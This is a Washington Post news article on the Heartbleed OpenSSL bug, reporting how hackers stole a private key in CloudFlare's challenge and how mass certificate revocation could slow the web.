Washington - Efforts to fix the notorious Heartbleed bug threaten to cause major disruptions to the internet over the next several weeks as companies scramble to repair encryption systems on hundreds of thousands of websites at the same time, security experts say.
Estimates of the severity of the bug’s damage have mounted almost daily since researchers announced the discovery of Heartbleed last week.
What initially seemed like an inconvenient matter of changing passwords for protection now appears much more serious. New revelations suggest that skilled hackers can use the bug to create fake websites that mimic legitimate ones to trick consumers into handing over personal information.
The sheer scale of the work required to fix this aspect of the bug – which makes it possible to steal the “security certificates” that verify that a website is authentic – could overwhelm the systems designed to keep the internet trustworthy.
“Imagine if we found out all at once that all the doors everybody uses are all vulnerable – they can all get broken into,” said Jason Healey, a cyber security scholar at the Washington-based Atlantic Council. “The kinds of bad things it enables is largely limited only by the imagination of the bad guys.”
The Heartbleed bug put many consumers’ user names and passwords at risk. Undetected for two years, the bug quietly undermined the basic security of the internet by leaving a gap in OpenSSL, an encryption technology used widely by businesses to protect sensitive data.
By some estimates, the bug affected as much as two-thirds of the internet; the flaw prompted thousands of web users to change their passwords on Google, Yahoo, Facebook and other major services.
No examples have surfaced of anyone actually exploiting the vulnerability. But last week, web services company CloudFlare issued an open challenge to hackers to see if Heartbleed could be used to do something really dangerous – steal the security certificates that prove Google, for instance, is really Google.
CloudFlare’s initial tests suggested it was probably impossible for an attacker to steal a site’s security certificate and lure visitors to a duplicate that looked and behaved like the real version.
For the challenge, CloudFlare urged internet users to run their own tests on a dummy server with the Heartbleed bug.
Hackers had to steal the security certificate from the server, then send a message to CloudFlare that was “signed” with the certificate in order to prove they had obtained it.
Within nine hours of the challenge’s launch – and three hours after he began working on the problem – a hacker named Fedor Indutny became the first to crack the code.
“It was just a fun way of spending Friday evening time, and a good chance to try my skills in a legal hacking action,” Indutny wrote in an e-mail to the Washington Post.
“After starting a script on a cloud server, I watched a movie and totally forgot about it. Checking the logs in approximately one hour, to my surprise, revealed a private key to me.”
Indutny’s coup was quickly followed by three more successful attempts at hacking the security key. One of the hackers, Ben Murphy, said it took him two hours to retrieve the secret key from CloudFlare’s server.
Stealing the certificate is labour intensive. Indutny’s attempt involved making 2.5 million requests of the CloudFlare server before he finally obtained the key. But what was thought to be impossible now turns out to be doable. Websites can indeed be tricked into giving up their identity papers, and those papers can be reused by malicious actors.
Changing your passwords will not protect you if you give them unwittingly to a hacker pretending to be your web mail provider.
In the days after Heartbleed was revealed, many websites raced to update their systems. Those fixes plugged the immediate hole so hackers could no longer take advantage of the vulnerability. But in light of this latest discovery, many sites still appear to be vulnerable; an attacker could have used Heartbleed to steal a site’s valid security keys any time before the site patched its systems.
The next step, experts say, is for all 500 000 affected sites to revoke their security certificates and issue new ones. But as necessary as that process is, it could have dramatic consequences for users’ everyday experiences.
When you visit a secure site, your browser checks the site’s security certificate against a list of invalidated certificates. Depending on how it is designed, the browser probably downloads that list to your computer. Because sites rarely change their certificates, the lists are relatively short.
But the Heartbleed exploit now requires hundreds of thousands of sites to add their certificates to the list, practically overnight. The certificate revocation lists will become bloated with new entries. And browsers will continue to download the now-massive files, according to Paul Mutton, a security consultant at the web services company Netcraft. Checking a site’s identity will take vastly longer.
“If a certificate authority has to revoke 10 000 certificates, that entry will have 10 000 certificates on it,” Mutton said. “And if browsers have to download that… we’re talking hundreds of megabytes.”
It’s roughly the equivalent of having to download 30 minutes’ worth of standard-definition video just to view a single web page.
Healey, of the Atlantic Council, said web security firms were left with two options. The first option is to risk slowing down the web in exchange for greater security. The second option is not much better.
“What’s the other solution? Ask people to be vulnerable for longer? That doesn’t strike me as particularly reasonable,” he said. – Washington Post